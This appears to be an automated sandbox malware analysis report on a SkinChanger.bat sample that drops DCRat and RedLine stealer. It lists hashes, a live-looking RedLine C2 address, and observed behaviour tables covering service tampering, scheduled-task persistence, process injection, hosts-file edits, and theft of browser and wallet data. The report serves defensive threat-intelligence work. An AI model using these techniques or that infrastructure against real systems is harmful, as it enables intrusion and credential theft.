dcrat | 97b786b850b37408f96541ba898f6f0032eecf76f6cb1f59ca8c750c5721688b

Analysis

max time kernel
137s
max time network
139s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
02-09-2022 11:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SkinChanger.bat
Size

24KB
MD5

e85403a4491b4ed319390201a735de7d
SHA1

bf93b11ce5d33046c8a110bff05d4c0e6b1d90a2
SHA256

97b786b850b37408f96541ba898f6f0032eecf76f6cb1f59ca8c750c5721688b
SHA512

d73ede4bae6b6cab73f46e7d7dda812fc1317ba6e1d0efff5d1ebca3015395b6ffa8c385b2005ec23603c835b478ea77c1ceba3ea12232e614604155e48e5859
SSDEEP

384:I55wqklVZlT/pHazFwZWvjKlFYatnvaY5o9GFIxqvFOcueWrC9:GY7azFwZSjKltvh5og6tcN8C9

Score

10^/10

dcrat redline dv discovery evasion exploit infostealer rat spyware stealer

Malware Config

Extracted

Family

redline

Botnet

195.3.223.79:65252

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

Process spawned unexpected child process 12 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5036	4192	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3816	4192	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2372	4192	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2208	4192	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4136	4192	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4596	4192	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2760	4192	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3384	4192	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5100	4192	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4140	4192	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3188	4192	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4512	4192	schtasks.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 3 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\1.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\1.exe	family_redline
behavioral1/memory/4088-353-0x0000000000120000-0x000000000013E000-memory.dmp	family_redline

DCRat payload 8 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\3.exe	dcrat
C:\Users\Admin\AppData\Local\Temp\3.exe	dcrat
C:\comsavesbroker\containersavesdhcp.exe	dcrat
C:\comsavesbroker\containersavesdhcp.exe	dcrat
behavioral1/memory/4120-528-0x00000000009A0000-0x0000000000C52000-memory.dmp	dcrat
C:\Users\Public\AccountPictures\Idle.exe	dcrat
C:\Users\Public\AccountPictures\Idle.exe	dcrat
behavioral1/memory/4856-1039-0x00000000003E0000-0x0000000000692000-memory.dmp	dcrat

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

2 3496 powershell.exe
Downloads MZ/PE file

flow	pid	process
2	3496	powershell.exe

Drops file in Drivers directory 2 IoCs

Processes:

2.exeupdaterchr.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	2.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	updaterchr.exe

Executes dropped EXE 8 IoCs

Processes:

SkinChanger.bat.exe1.exe2.exe3.execontainersavesdhcp.exeupdaterchr.exeIdle.exeexplorer.exe

pid process

996 SkinChanger.bat.exe
4088 1.exe
4216 2.exe
4824 3.exe
4120 containersavesdhcp.exe
1640 updaterchr.exe
4856 Idle.exe
5540 explorer.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

icacls.exetakeown.exeicacls.exetakeown.exe

pid process

4256 icacls.exe
1744 takeown.exe
1520 icacls.exe
5444 takeown.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

1744 takeown.exe
1520 icacls.exe
5444 takeown.exe
4256 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

13 ipinfo.io
14 ipinfo.io

pid	process
4256	icacls.exe
1744	takeown.exe
1520	icacls.exe
5444	takeown.exe

pid	process
1744	takeown.exe
1520	icacls.exe
5444	takeown.exe
4256	icacls.exe

flow	ioc
13	ipinfo.io
14	ipinfo.io

Drops file in System32 directory 7 IoCs

Processes:

updaterchr.exepowershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\updaterchr.exe.log	updaterchr.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\8613.tmp	updaterchr.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

updaterchr.exe

description pid process target process

PID 1640 set thread context of 5540 1640 updaterchr.exe explorer.exe

description	pid	process	target process
PID 1640 set thread context of 5540	1640	updaterchr.exe	explorer.exe

Drops file in Program Files directory 11 IoCs

Processes:

containersavesdhcp.exeupdaterchr.exe2.exe

description	ioc	process
File opened for modification	C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\RCX7020.tmp	containersavesdhcp.exe
File opened for modification	C:\Program Files\Windows Portable Devices\RCX72A2.tmp	containersavesdhcp.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updaterchr.exe
File opened for modification	C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dllhost.exe	containersavesdhcp.exe
File created	C:\Program Files\Google\Chrome\updaterchr.exe	2.exe
File opened for modification	C:\Program Files\Google\Chrome\updaterchr.exe	2.exe
File created	C:\Program Files\Windows Portable Devices\27d1bcfc3c54e0	containersavesdhcp.exe
File created	C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dllhost.exe	containersavesdhcp.exe
File created	C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\5940a34987c991	containersavesdhcp.exe
File created	C:\Program Files\Windows Portable Devices\System.exe	containersavesdhcp.exe
File opened for modification	C:\Program Files\Windows Portable Devices\System.exe	containersavesdhcp.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

4712 sc.exe
5028 sc.exe
1748 sc.exe
4132 sc.exe
4100 sc.exe
4148 sc.exe
4616 sc.exe
4264 sc.exe
4848 sc.exe
3792 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
4712	sc.exe
5028	sc.exe
1748	sc.exe
4132	sc.exe
4100	sc.exe
4148	sc.exe
4616	sc.exe
4264	sc.exe
4848	sc.exe
3792	sc.exe

Creates scheduled task(s) 1 TTPs 12 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
2208	schtasks.exe
4596	schtasks.exe
5100	schtasks.exe
4140	schtasks.exe
5036	schtasks.exe
3816	schtasks.exe
2760	schtasks.exe
3384	schtasks.exe
3188	schtasks.exe
4512	schtasks.exe
2372	schtasks.exe
4136	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

updaterchr.exepowershell.exepowershell.exeexplorer.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	updaterchr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	updaterchr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	updaterchr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	updaterchr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe

Modifies registry class 3 IoCs

Processes:

Idle.exe3.execontainersavesdhcp.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000_Classes\Local Settings	Idle.exe
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000_Classes\Local Settings	3.exe
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000_Classes\Local Settings	containersavesdhcp.exe

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
4336	reg.exe
2192	reg.exe
656	reg.exe
1796	reg.exe
1040	reg.exe
32	reg.exe
1852	reg.exe
2340	reg.exe
4852	reg.exe
2860	reg.exe
968	reg.exe
3388	reg.exe
2300	reg.exe
4280	reg.exe
1008	reg.exe
4300	reg.exe
4824	reg.exe
5496	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

SkinChanger.bat.exepowershell.exepowershell.exepowershell.exepowershell.execontainersavesdhcp.exe2.exepowershell.exe1.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
996	SkinChanger.bat.exe
996	SkinChanger.bat.exe
996	SkinChanger.bat.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
4056	powershell.exe
4056	powershell.exe
4056	powershell.exe
4672	powershell.exe
4672	powershell.exe
4672	powershell.exe
4924	powershell.exe
4924	powershell.exe
4924	powershell.exe
4120	containersavesdhcp.exe
4120	containersavesdhcp.exe
4120	containersavesdhcp.exe
4120	containersavesdhcp.exe
4120	containersavesdhcp.exe
4216	2.exe
3492	powershell.exe
3492	powershell.exe
3492	powershell.exe
4088	1.exe
4784	powershell.exe
4784	powershell.exe
3716	powershell.exe
3716	powershell.exe
4224	powershell.exe
4224	powershell.exe
4208	powershell.exe
4208	powershell.exe
4148	powershell.exe
4148	powershell.exe
3588	powershell.exe
3588	powershell.exe
3196	powershell.exe
3196	powershell.exe
4208	powershell.exe
4020	powershell.exe
4020	powershell.exe
4224	powershell.exe
1356	powershell.exe
1356	powershell.exe
5032	powershell.exe
5032	powershell.exe
4640	powershell.exe
4640	powershell.exe
196	powershell.exe
196	powershell.exe
196	powershell.exe
4980	powershell.exe
4980	powershell.exe
3716	powershell.exe
4784	powershell.exe
3588	powershell.exe
3196	powershell.exe
4148	powershell.exe
4640	powershell.exe
5032	powershell.exe
1356	powershell.exe
4020	powershell.exe
4980	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Idle.exe

pid process

4856 Idle.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

632

pid	process
4856	Idle.exe

pid	process
632

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

SkinChanger.bat.exepowershell.exepowershell.exepowershell.exe1.exepowershell.exepowercfg.execontainersavesdhcp.exepowercfg.exepowercfg.exepowercfg.exetakeown.exe

description	pid	process
Token: SeDebugPrivilege	996	SkinChanger.bat.exe
Token: SeDebugPrivilege	3496	powershell.exe
Token: SeDebugPrivilege	4056	powershell.exe
Token: SeIncreaseQuotaPrivilege	3496	powershell.exe
Token: SeSecurityPrivilege	3496	powershell.exe
Token: SeTakeOwnershipPrivilege	3496	powershell.exe
Token: SeLoadDriverPrivilege	3496	powershell.exe
Token: SeSystemProfilePrivilege	3496	powershell.exe
Token: SeSystemtimePrivilege	3496	powershell.exe
Token: SeProfSingleProcessPrivilege	3496	powershell.exe
Token: SeIncBasePriorityPrivilege	3496	powershell.exe
Token: SeCreatePagefilePrivilege	3496	powershell.exe
Token: SeBackupPrivilege	3496	powershell.exe
Token: SeRestorePrivilege	3496	powershell.exe
Token: SeShutdownPrivilege	3496	powershell.exe
Token: SeDebugPrivilege	3496	powershell.exe
Token: SeSystemEnvironmentPrivilege	3496	powershell.exe
Token: SeRemoteShutdownPrivilege	3496	powershell.exe
Token: SeUndockPrivilege	3496	powershell.exe
Token: SeManageVolumePrivilege	3496	powershell.exe
Token: 33	3496	powershell.exe
Token: 34	3496	powershell.exe
Token: 35	3496	powershell.exe
Token: 36	3496	powershell.exe
Token: SeDebugPrivilege	4672	powershell.exe
Token: SeIncreaseQuotaPrivilege	4672	powershell.exe
Token: SeSecurityPrivilege	4672	powershell.exe
Token: SeTakeOwnershipPrivilege	4672	powershell.exe
Token: SeLoadDriverPrivilege	4672	powershell.exe
Token: SeSystemProfilePrivilege	4672	powershell.exe
Token: SeSystemtimePrivilege	4672	powershell.exe
Token: SeProfSingleProcessPrivilege	4672	powershell.exe
Token: SeIncBasePriorityPrivilege	4672	powershell.exe
Token: SeCreatePagefilePrivilege	4672	powershell.exe
Token: SeBackupPrivilege	4672	powershell.exe
Token: SeRestorePrivilege	4672	powershell.exe
Token: SeShutdownPrivilege	4672	powershell.exe
Token: SeDebugPrivilege	4672	powershell.exe
Token: SeSystemEnvironmentPrivilege	4672	powershell.exe
Token: SeRemoteShutdownPrivilege	4672	powershell.exe
Token: SeUndockPrivilege	4672	powershell.exe
Token: SeManageVolumePrivilege	4672	powershell.exe
Token: 33	4672	powershell.exe
Token: 34	4672	powershell.exe
Token: 35	4672	powershell.exe
Token: 36	4672	powershell.exe
Token: SeDebugPrivilege	4088	1.exe
Token: SeDebugPrivilege	4924	powershell.exe
Token: SeShutdownPrivilege	4800	powercfg.exe
Token: SeCreatePagefilePrivilege	4800	powercfg.exe
Token: SeDebugPrivilege	4120	containersavesdhcp.exe
Token: SeShutdownPrivilege	5012	powercfg.exe
Token: SeCreatePagefilePrivilege	5012	powercfg.exe
Token: SeShutdownPrivilege	3316	powercfg.exe
Token: SeCreatePagefilePrivilege	3316	powercfg.exe
Token: SeShutdownPrivilege	4980	powercfg.exe
Token: SeCreatePagefilePrivilege	4980	powercfg.exe
Token: SeTakeOwnershipPrivilege	1744	takeown.exe
Token: SeIncreaseQuotaPrivilege	4924	powershell.exe
Token: SeSecurityPrivilege	4924	powershell.exe
Token: SeTakeOwnershipPrivilege	4924	powershell.exe
Token: SeLoadDriverPrivilege	4924	powershell.exe
Token: SeSystemProfilePrivilege	4924	powershell.exe
Token: SeSystemtimePrivilege	4924	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Idle.exe

pid process

4856 Idle.exe

pid	process
4856	Idle.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exenet.exeSkinChanger.bat.execmd.exepowershell.exe2.exe3.exeWScript.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2204 wrote to memory of 2624	2204	cmd.exe	net.exe
PID 2204 wrote to memory of 2624	2204	cmd.exe	net.exe
PID 2624 wrote to memory of 2676	2624	net.exe	net1.exe
PID 2624 wrote to memory of 2676	2624	net.exe	net1.exe
PID 2204 wrote to memory of 996	2204	cmd.exe	SkinChanger.bat.exe
PID 2204 wrote to memory of 996	2204	cmd.exe	SkinChanger.bat.exe
PID 996 wrote to memory of 3496	996	SkinChanger.bat.exe	powershell.exe
PID 996 wrote to memory of 3496	996	SkinChanger.bat.exe	powershell.exe
PID 996 wrote to memory of 1396	996	SkinChanger.bat.exe	cmd.exe
PID 996 wrote to memory of 1396	996	SkinChanger.bat.exe	cmd.exe
PID 1396 wrote to memory of 4140	1396	cmd.exe	choice.exe
PID 1396 wrote to memory of 4140	1396	cmd.exe	choice.exe
PID 3496 wrote to memory of 4056	3496	powershell.exe	powershell.exe
PID 3496 wrote to memory of 4056	3496	powershell.exe	powershell.exe
PID 1396 wrote to memory of 1712	1396	cmd.exe	attrib.exe
PID 1396 wrote to memory of 1712	1396	cmd.exe	attrib.exe
PID 3496 wrote to memory of 4088	3496	powershell.exe	1.exe
PID 3496 wrote to memory of 4088	3496	powershell.exe	1.exe
PID 3496 wrote to memory of 4088	3496	powershell.exe	1.exe
PID 3496 wrote to memory of 4216	3496	powershell.exe	2.exe
PID 3496 wrote to memory of 4216	3496	powershell.exe	2.exe
PID 3496 wrote to memory of 4824	3496	powershell.exe	3.exe
PID 3496 wrote to memory of 4824	3496	powershell.exe	3.exe
PID 3496 wrote to memory of 4824	3496	powershell.exe	3.exe
PID 4216 wrote to memory of 4672	4216	2.exe	powershell.exe
PID 4216 wrote to memory of 4672	4216	2.exe	powershell.exe
PID 4824 wrote to memory of 3732	4824	3.exe	WScript.exe
PID 4824 wrote to memory of 3732	4824	3.exe	WScript.exe
PID 4824 wrote to memory of 3732	4824	3.exe	WScript.exe
PID 3732 wrote to memory of 3260	3732	WScript.exe	cmd.exe
PID 3732 wrote to memory of 3260	3732	WScript.exe	cmd.exe
PID 3732 wrote to memory of 3260	3732	WScript.exe	cmd.exe
PID 3260 wrote to memory of 4120	3260	cmd.exe	containersavesdhcp.exe
PID 3260 wrote to memory of 4120	3260	cmd.exe	containersavesdhcp.exe
PID 4216 wrote to memory of 760	4216	2.exe	cmd.exe
PID 4216 wrote to memory of 760	4216	2.exe	cmd.exe
PID 4216 wrote to memory of 4528	4216	2.exe	cmd.exe
PID 4216 wrote to memory of 4528	4216	2.exe	cmd.exe
PID 760 wrote to memory of 4264	760	cmd.exe	sc.exe
PID 760 wrote to memory of 4264	760	cmd.exe	sc.exe
PID 4216 wrote to memory of 4924	4216	2.exe	powershell.exe
PID 4216 wrote to memory of 4924	4216	2.exe	powershell.exe
PID 760 wrote to memory of 4848	760	cmd.exe	sc.exe
PID 760 wrote to memory of 4848	760	cmd.exe	sc.exe
PID 760 wrote to memory of 3792	760	cmd.exe	sc.exe
PID 760 wrote to memory of 3792	760	cmd.exe	sc.exe
PID 760 wrote to memory of 4100	760	cmd.exe	sc.exe
PID 760 wrote to memory of 4100	760	cmd.exe	sc.exe
PID 760 wrote to memory of 4148	760	cmd.exe	sc.exe
PID 760 wrote to memory of 4148	760	cmd.exe	sc.exe
PID 760 wrote to memory of 1796	760	cmd.exe	reg.exe
PID 760 wrote to memory of 1796	760	cmd.exe	reg.exe
PID 4528 wrote to memory of 4800	4528	cmd.exe	powercfg.exe
PID 4528 wrote to memory of 4800	4528	cmd.exe	powercfg.exe
PID 760 wrote to memory of 4336	760	cmd.exe	reg.exe
PID 760 wrote to memory of 4336	760	cmd.exe	reg.exe
PID 760 wrote to memory of 968	760	cmd.exe	reg.exe
PID 760 wrote to memory of 968	760	cmd.exe	reg.exe
PID 760 wrote to memory of 1040	760	cmd.exe	reg.exe
PID 760 wrote to memory of 1040	760	cmd.exe	reg.exe
PID 4528 wrote to memory of 5012	4528	cmd.exe	powercfg.exe
PID 4528 wrote to memory of 5012	4528	cmd.exe	powercfg.exe
PID 4528 wrote to memory of 3316	4528	cmd.exe	powercfg.exe
PID 4528 wrote to memory of 3316	4528	cmd.exe	powercfg.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

1712 attrib.exe

pid	process
1712	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SkinChanger.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2204

C:\Windows\system32\net.exe
net file
2⤵
- Suspicious use of WriteProcessMemory
PID:2624

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
3⤵
PID:2676

C:\Users\Admin\AppData\Local\Temp\SkinChanger.bat.exe
